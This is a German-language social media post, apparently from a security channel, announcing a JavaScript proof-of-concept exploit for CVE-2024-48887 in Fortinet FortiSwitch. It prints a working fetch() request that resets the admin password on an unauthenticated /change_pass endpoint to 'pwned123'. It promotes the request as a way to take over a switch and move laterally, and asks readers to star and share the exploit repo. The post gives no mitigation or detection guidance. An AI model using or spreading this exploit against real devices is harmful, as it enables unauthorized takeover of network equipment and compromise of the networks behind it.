
ein leichtgewichtiges JavaScript-Snippet, das zeigt, wie unberechtigte Passwortänderungen auf anfälligen Fortinet FortiSwitch GUI-Endpunkten ausgelöst werden können.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 Gerade ein leichtgewichtiges JavaScript-Snippet veröffentlicht, das zeigt, wie unbefugte Passwortänderungen auf anfälligen Fortinet FortiSwitch GUI-Endpunkten ausgelöst werden können.
🛠️ Über die Schwachstelle: Ein Angreifer kann eine einfache fetch()-Anfrage erstellen, um Passworteinstellungen ohne Authentifizierung zu manipulieren, indem er direkt auf /change_pass-Endpunktvarianten abzielt.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Auswirkungen: Vollständige Switch-Übernahme, Potenzial für laterale Bewegung und Netzwerkkompromittierung.
📁 Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Gib dem Repo einen Stern und teile es mit deinen Infosec-Kollegen!
📢 Folge der vollständigen Analyse und den Echtzeit-Warnungen über @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground